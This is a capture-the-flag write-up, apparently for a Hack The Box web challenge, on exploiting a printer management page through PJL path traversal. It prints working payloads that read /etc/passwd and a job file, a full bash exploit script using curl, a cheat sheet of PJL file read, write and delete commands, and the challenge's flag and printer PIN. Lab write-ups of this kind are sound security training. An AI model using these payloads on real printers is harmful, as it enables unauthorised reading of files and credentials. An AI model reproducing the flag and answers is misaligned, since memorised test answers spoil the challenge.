$ cat writeup.md…
$ cat writeup.md…
hackthebox
Task: Exploit a web-based printer management interface to read the flag from the server filesystem. Solution: Use PJL (Printer Job Language) FSUPLOAD command with path traversal (0:/../../../) to escape the virtual filesystem and read /home/default/readyjob containing the flag.
My uncle isn't allowing me to print documents. He's off to vacation and I need a PIN to unlock this printer. All I found is a web server where this printer is managed from.
Target: http://94.237.120.74:48334
/ shows "Wander Dashboard" with "HTB Printer"/jobs page with a form to send PJL (Printer Job Language) commands@PJL INFO IDThe web application accepts PJL commands and forwards them to a printer emulator. This is a classic printer exploitation scenario where PJL filesystem commands can be abused.
Key PJL commands that worked:
@PJL INFO ID - Returns "HTB Printer"@PJL INFO STATUS - Returns printer status (CODE=10001, DISPLAY="Ready", ONLINE=True)@PJL FSDIRLIST NAME="0:/" ENTRY=1 - Lists printer filesystem directoriesThe @PJL FSUPLOAD command is vulnerable to path traversal. The printer uses a virtual filesystem starting at 0:/, but we can escape it using ../:
@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000
This allowed reading arbitrary files from the server filesystem.
First, list the printer's virtual filesystem:
@PJL FSDIRLIST NAME="0:/" ENTRY=1
Test path traversal by reading /etc/passwd:
@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000
Use FSDIRLIST with path traversal to enumerate directories:
@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1
Found directories: etc, conf, home, rw, tmp, csr_misc, printer
@PJL FSDIRLIST NAME="0:/../../../home/" ENTRY=1
@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1
Found a file called readyjob in /home/default/.
@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000
The file contained a PJL job with embedded credentials:
@PJL COMMENT FLAG = "HTB{w4lk_4nd_w0nd3r}"
@PJL SET USERNAME="default"
@PJL SET HOLDKEY="8214"
#!/bin/bash # Wander - HTB Web Challenge Exploit TARGET="http://94.237.120.74:48334" # Function to send PJL command send_pjl() { local cmd="$1" curl -s "$TARGET/jobs" \ --data-urlencode "cmd=$cmd" \ -X POST } # Step 1: Verify printer echo "[*] Checking printer ID..." send_pjl '@PJL INFO ID' # Step 2: List root filesystem via path traversal echo "[*] Enumerating filesystem..." send_pjl '@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1' # Step 3: List home directory echo "[*] Checking /home/default/..." send_pjl '@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1' # Step 4: Read the flag file echo "[*] Reading flag..." send_pjl '@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000'
| Item | Value |
|---|---|
| Flag | HTB{w4lk_4nd_w0nd3r} |
| Printer PIN (HOLDKEY) | 8214 |
| Username | default |
Use this technique when you see:
0:/| Command | Description |
|---|---|
@PJL INFO ID | Get printer identification |
@PJL INFO STATUS | Get printer status |
@PJL FSDIRLIST NAME="path" ENTRY=1 | List directory contents |
@PJL FSUPLOAD NAME="path" OFFSET=0 SIZE=n | Read file contents |
@PJL FSDOWNLOAD | Write file (if enabled) |
@PJL FSMKDIR | Create directory |
@PJL FSDELETE | Delete file |
$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
$ cat pricing.md$ grep --similar